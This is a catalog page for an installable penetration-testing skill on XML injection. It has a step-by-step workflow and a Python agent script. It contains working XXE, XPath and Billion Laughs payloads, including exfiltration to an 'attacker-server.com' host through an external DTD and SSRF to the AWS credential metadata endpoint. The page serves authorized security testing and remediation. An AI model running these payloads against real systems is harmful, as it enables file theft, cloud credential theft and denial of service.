web application security

Testing for XML Injection Vulnerabilities

Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks.

dtd-attackentity-injectionweb-securityxml-injectionxml-parsingxpath-injectionxxe
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

When to Use

  • When testing applications that process XML input (SOAP APIs, XML-RPC, file uploads)
  • During penetration testing of applications with XML parsers
  • When assessing SAML-based authentication implementations
  • When testing file import/export functionality that handles XML formats
  • During API security testing of SOAP or XML-based web services

Prerequisites

  • Burp Suite with XML-related extensions (Content Type Converter, XXE Scanner)
  • XMLLint or similar XML validation tools
  • Understanding of XML structure, DTDs, and entity processing
  • Python 3.x with lxml and requests libraries
  • Access to an out-of-band interaction server (Burp Collaborator, interact.sh)
  • Sample XXE payloads from PayloadsAllTheThings repository

Workflow

Step 1 — Identify XML Processing Endpoints

# Look for endpoints accepting XML content types
# Content-Type: application/xml, text/xml, application/soap+xml
# Check WSDL files for SOAP services
curl -s http://target.com/service?wsdl
 
# Test if endpoint accepts XML by changing Content-Type
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><root><test>hello</test></root>'
 
# Check for XML file upload functionality
# Look for .xml, .svg, .xlsx, .docx file processing

Step 2 — Test for Basic XXE (File Retrieval)

<!-- Basic XXE to read local files -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
 
<!-- Windows file retrieval -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root><data>&xxe;</data></root>
 
<!-- Using PHP wrapper for base64-encoded file content -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>

Step 3 — Test for Blind XXE with Out-of-Band Detection

<!-- Out-of-band XXE using external DTD -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
  %xxe;
]>
<root><data>test</data></root>
 
<!-- External DTD file (xxe.dtd hosted on attacker server) -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
%eval;
%exfil;
 
<!-- DNS-based out-of-band detection -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
]>
<root><data>&xxe;</data></root>

Step 4 — Test for SSRF via XXE

<!-- Internal network scanning via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>
 
<!-- AWS metadata endpoint access -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
 
<!-- Internal port scanning -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server:8080/">
]>
<root><data>&xxe;</data></root>

Step 5 — Test for XPath Injection

# Basic XPath injection in search parameters
curl "http://target.com/search?query=' or '1'='1"
 
# XPath authentication bypass
curl -X POST http://target.com/login \
  -d "username=' or '1'='1&password=' or '1'='1"
 
# XPath data extraction
curl "http://target.com/search?query=' or 1=1 or ''='"
 
# Blind XPath injection with boolean-based extraction
curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"

Step 6 — Test for XML Billion Laughs (DoS)

<!-- Billion Laughs attack (use only in authorized testing) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>
 
<!-- Quadratic blowup attack -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>

Key Concepts

Concept Description
XXE (XML External Entity) Attack exploiting XML parsers that process external entity references
Blind XXE XXE where response is not reflected; requires out-of-band channels
XPath Injection Injection into XPath queries used to navigate XML documents
DTD (Document Type Definition) Declarations that define XML document structure and entities
Parameter Entities Special entities (%) used within DTDs for blind XXE exploitation
SSRF via XXE Using XXE to make server-side requests to internal resources
XML Bomb Denial of service via recursive entity expansion (Billion Laughs)

Tools & Systems

Tool Purpose
Burp Suite HTTP proxy with XXE Scanner extension for automated detection
XXEinjector Automated XXE injection and data exfiltration tool
OXML_XXE Tool for embedding XXE payloads in Office XML documents
xmllint XML validation and parsing utility for payload testing
interact.sh Out-of-band interaction server for blind XXE detection
Content Type Converter Burp extension to convert JSON requests to XML for XXE testing

Common Scenarios

  1. File Disclosure — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
  2. SSRF to Cloud Metadata — Access AWS/GCP/Azure metadata endpoints through XXE to steal IAM credentials and access tokens
  3. Blind Data Exfiltration — Extract sensitive data through out-of-band DNS/HTTP channels when XXE output is not reflected
  4. SAML XXE — Inject XXE payloads into SAML assertions during single sign-on authentication flows
  5. SVG File Upload XXE — Upload malicious SVG files containing XXE payloads to trigger server-side XML parsing

Output Format

## XML Injection Assessment Report
- **Target**: http://target.com/api/xml-endpoint
- **Vulnerability Types Found**: XXE, Blind XXE, XPath Injection
- **Severity**: Critical
 
### Findings
| # | Type | Endpoint | Payload | Impact |
|---|------|----------|---------|--------|
| 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |
| 2 | Blind XXE | POST /api/upload | External DTD with OOB | Data Exfiltration |
| 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
 
### Remediation
- Disable external entity processing in XML parser configuration
- Use JSON instead of XML where possible
- Implement XML schema validation with strict DTD restrictions
- Block outbound connections from XML processing services
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 1

api-reference.md1.7 KB

API Reference: Testing for XML Injection Vulnerabilities

XXE Payload Types

Payload Severity Description
File read (Linux) Critical file:///etc/passwd entity inclusion
File read (Windows) Critical file:///c:/windows/win.ini entity
SSRF via HTTP Critical Entity fetching internal metadata URL
Parameter entity High External DTD loading via %entity
Billion laughs High Recursive entity expansion (DoS)
UTF-7 encoding High Encoding bypass for WAF evasion

XPath Injection Payloads

Payload Purpose
' or '1'='1 Boolean-based auth bypass
'] | //user/password | //foo[' Data extraction via union
1 or 1=1 Numeric context injection

Detection Indicators

Attack Success Indicator
Linux file read root: in response body
Windows file read [fonts] or extensions in response
SSRF metadata ami-id or instance-id in response
Billion laughs Response time > 5 seconds
Content-type switch XML accepted when JSON expected
SVG XXE root: in upload response

Python Libraries

Library Version Purpose
requests >=2.28 HTTP POST with XML payloads
json stdlib Report generation
pathlib stdlib Output directory management

References

Scripts 1

agent.py7.6 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""Agent for testing XML injection vulnerabilities.

Tests web applications for XXE (XML External Entity), XPath
injection, and XML entity expansion attacks that enable file
disclosure, SSRF, and denial of service.
"""

import json
import sys
from pathlib import Path
from datetime import datetime

try:
    import requests
except ImportError:
    requests = None


XXE_PAYLOADS = {
    "file_read_linux": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
    "file_read_windows": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><root>&xxe;</root>',
    "ssrf_http": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>',
    "parameter_entity": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://ATTACKER/evil.dtd">%xxe;]><root>test</root>',
    "billion_laughs": '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">]><root>&lol3;</root>',
    "utf7_encoding": '<?xml version="1.0" encoding="UTF-7"?>+ADw-!DOCTYPE foo +AFs-+ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-+AF0-+AD4-+ADw-root+AD4-+ACY-xxe+ADs-+ADw-/root+AD4-',
}

XPATH_PAYLOADS = [
    "' or '1'='1",
    "' or 1=1 or '",
    "admin' or '1'='1",
    "'] | //user/password | //foo['",
    "1 or 1=1",
]


class XMLInjectionTestAgent:
    """Tests for XML injection vulnerabilities."""

    def __init__(self, target_url, output_dir="./xml_injection_test"):
        self.target_url = target_url.rstrip("/")
        self.output_dir = Path(output_dir)
        self.output_dir.mkdir(parents=True, exist_ok=True)
        self.findings = []

    def _post_xml(self, path, xml_data, timeout=15):
        if not requests:
            return None
        try:
            return requests.post(
                f"{self.target_url}{path}",
                data=xml_data,
                headers={"Content-Type": "application/xml"},
                timeout=timeout,
            )
        except requests.RequestException:
            return None

    def _post_json(self, path, data, timeout=15):
        if not requests:
            return None
        try:
            return requests.post(
                f"{self.target_url}{path}", json=data, timeout=timeout
            )
        except requests.RequestException:
            return None

    def test_xxe(self, endpoint, custom_template=None):
        """Test endpoint for XXE vulnerabilities."""
        results = []
        for name, payload in XXE_PAYLOADS.items():
            if custom_template:
                payload = custom_template.replace("PAYLOAD_HERE", payload)

            resp = self._post_xml(endpoint, payload)
            if not resp:
                continue

            indicators = {
                "file_read_linux": "root:" in resp.text,
                "file_read_windows": "[fonts]" in resp.text or "extensions" in resp.text.lower(),
                "ssrf_http": "ami-id" in resp.text or "instance-id" in resp.text,
                "parameter_entity": resp.status_code == 200,
                "billion_laughs": resp.elapsed.total_seconds() > 5,
                "utf7_encoding": "root:" in resp.text,
            }

            if indicators.get(name, False):
                severity = "critical" if "file_read" in name or "ssrf" in name else "high"
                results.append({
                    "payload": name,
                    "status": resp.status_code,
                    "response_preview": resp.text[:200],
                    "vulnerable": True,
                })
                self.findings.append({
                    "severity": severity,
                    "type": "XXE",
                    "detail": f"{name} successful at {endpoint}",
                })
        return results

    def test_xpath_injection(self, endpoint, field_name="username"):
        """Test for XPath injection in search/login endpoints."""
        results = []
        for payload in XPATH_PAYLOADS:
            data = {field_name: payload}
            resp = self._post_json(endpoint, data)
            if not resp:
                continue

            if resp.status_code == 200 and len(resp.text) > 50:
                results.append({
                    "payload": payload,
                    "status": resp.status_code,
                    "response_length": len(resp.text),
                })
                self.findings.append({
                    "severity": "high",
                    "type": "XPath Injection",
                    "detail": f"XPath injection at {endpoint} with '{payload[:30]}'",
                })
        return results

    def test_content_type_switch(self, endpoint, original_json=None):
        """Test if endpoint accepts XML when JSON is expected."""
        payload = original_json or {"username": "test", "password": "test"}
        xml_equiv = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        xml_equiv += f'<root><username>&xxe;</username><password>test</password></root>'

        resp = self._post_xml(endpoint, xml_equiv)
        if resp and resp.status_code in (200, 201):
            accepted = True
            if "root:" in resp.text:
                self.findings.append({
                    "severity": "critical",
                    "type": "Content-Type Switch XXE",
                    "detail": f"Endpoint {endpoint} accepts XML with XXE when JSON expected",
                })
            return {"accepted": accepted, "status": resp.status_code}
        return {"accepted": False}

    def test_svg_xxe(self, upload_endpoint, field_name="file"):
        """Test SVG file upload for XXE."""
        svg_xxe = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>'''

        if not requests:
            return {"error": "requests not available"}
        try:
            resp = requests.post(
                f"{self.target_url}{upload_endpoint}",
                files={field_name: ("test.svg", svg_xxe, "image/svg+xml")},
                timeout=15,
            )
            if resp and "root:" in resp.text:
                self.findings.append({
                    "severity": "critical",
                    "type": "SVG XXE",
                    "detail": f"SVG upload at {upload_endpoint} triggers XXE",
                })
                return {"vulnerable": True}
        except requests.RequestException:
            pass
        return {"vulnerable": False}

    def generate_report(self, endpoints=None):
        xxe_results = []
        if endpoints:
            for ep in endpoints:
                xxe_results.extend(self.test_xxe(ep))

        report = {
            "report_date": datetime.utcnow().isoformat(),
            "target": self.target_url,
            "xxe_results": xxe_results,
            "findings": self.findings,
            "total_findings": len(self.findings),
        }
        out = self.output_dir / "xml_injection_report.json"
        with open(out, "w") as f:
            json.dump(report, f, indent=2)
        print(json.dumps(report, indent=2))
        return report


def main():
    if len(sys.argv) < 2:
        print("Usage: agent.py <target_url> [--endpoint /api/xml]")
        sys.exit(1)
    url = sys.argv[1]
    endpoints = ["/api/xml"]
    if "--endpoint" in sys.argv:
        endpoints = [sys.argv[sys.argv.index("--endpoint") + 1]]
    agent = XMLInjectionTestAgent(url)
    agent.generate_report(endpoints)


if __name__ == "__main__":
    main()
Keep exploring